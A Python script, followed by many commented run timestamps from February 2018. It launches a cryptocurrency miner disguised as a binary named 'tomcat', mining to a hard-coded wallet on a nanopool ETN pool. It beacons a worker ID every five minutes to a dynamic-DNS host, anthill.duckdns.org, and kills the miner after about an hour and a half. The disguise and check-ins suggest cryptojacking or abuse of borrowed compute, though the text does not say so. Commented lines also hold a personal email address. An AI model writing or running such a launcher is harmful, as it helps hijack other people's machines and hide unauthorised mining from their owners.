import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:27:03.934118
#2018-02-17 16:13:01.517045
#2018-02-17 17:59:06.142856
#2018-02-17 19:48:07.822974
#2018-02-17 21:37:07.635631
#2018-02-17 23:23:01.239790
#2018-02-18 01:12:04.515573
#2018-02-18 02:59:03.774895
#2018-02-18 04:48:06.784296
#2018-02-18 06:38:01.438724
#2018-02-18 08:27:03.864593
#2018-02-18 10:14:03.417447
#2018-02-18 12:00:08.137803
#2018-02-18 13:44:06.807569
#2018-02-18 15:35:07.406605
#2018-02-18 17:23:03.403262
#2018-02-18 19:12:03.490983
#2018-02-18 20:58:06.755492
#2018-02-18 22:43:01.760435
#2018-02-19 00:32:07.054521
#2018-02-19 02:17:06.741901
#2018-02-19 04:06:01.568623
#2018-02-19 05:50:03.787165
#2018-02-19 07:39:06.225933
#2018-02-19 09:28:07.688032
#2018-02-19 11:18:01.298565
#2018-02-19 13:06:08.735314
#2018-02-19 14:54:08.411631
#2018-02-19 16:43:06.037670
#2018-02-19 18:32:07.601730
#2018-02-19 20:19:06.819649
#2018-02-19 22:08:03.629224
#2018-02-19 23:54:04.015679
#2018-02-20 01:40:07.659175
#2018-02-20 03:28:07.561142
#2018-02-20 05:15:07.527184
#2018-02-20 06:57:06.464922
#2018-02-20 08:43:08.422300
#2018-02-20 10:27:07.490120
#2018-02-20 12:12:05.973586
#2018-02-20 14:01:06.565476
#2018-02-20 15:46:08.864826
#2018-02-20 17:33:06.659483
#2018-02-20 19:22:03.668839
#2018-02-20 21:12:06.028147
#2018-02-20 22:57:04.661923
#2018-02-21 00:39:08.004044
#2018-02-21 02:25:01.411312
#2018-02-21 04:12:02.205881
#2018-02-21 05:58:04.788919
#2018-02-21 07:46:04.928878
#2018-02-21 09:28:03.863442
#2018-02-21 11:17:08.032649
#2018-02-21 13:04:07.231737
#2018-02-21 14:51:08.017130
#2018-02-21 16:41:06.484490
#2018-02-21 18:31:02.100695
#2018-02-21 20:17:04.679723
#2018-02-21 22:06:04.137218
#2018-02-21 23:52:07.887828
#2018-02-22 01:38:05.508571
#2018-02-22 03:26:01.225002
#2018-02-22 05:13:06.156777
#2018-02-22 06:58:07.140550
#2018-02-22 08:47:04.640352
#2018-02-22 10:34:05.496037
#2018-02-22 12:21:08.022838
#2018-02-22 14:04:06.708045
#2018-02-22 15:52:09.916668
#2018-02-22 17:39:09.831204
#2018-02-22 19:27:06.486959
#2018-02-22 21:20:07.209202
#2018-02-22 23:05:06.639798
#2018-02-23 00:53:01.873994
#2018-02-23 02:40:06.825425
#2018-02-23 04:27:04.161254
#2018-02-23 06:14:07.251867
#2018-02-23 08:01:04.881192
#2018-02-23 10:17:05.649365
#2018-02-23 12:11:07.352277
#2018-02-23 13:58:07.218247
#2018-02-23 15:51:02.139037
#2018-02-23 17:37:07.651599
#2018-02-23 19:25:09.541505
#2018-02-23 21:08:07.783487
#2018-02-23 22:55:01.870290
#2018-02-24 00:33:08.027020
#2018-02-24 02:24:01.972808
#2018-02-24 04:13:05.597410
#2018-02-24 06:01:01.864428
#2018-02-24 07:50:04.632240
#2018-02-24 09:35:09.195699
#2018-02-24 11:29:02.129109
#2018-02-24 13:18:05.842547
#2018-02-24 15:09:06.296748
#2018-02-24 16:58:01.523989
#2018-02-24 18:46:01.441391
#2018-02-24 20:38:02.133118
#2018-02-25 01:15:05.299969
#2018-02-25 05:11:04.136021
#2018-02-25 10:42:01.907591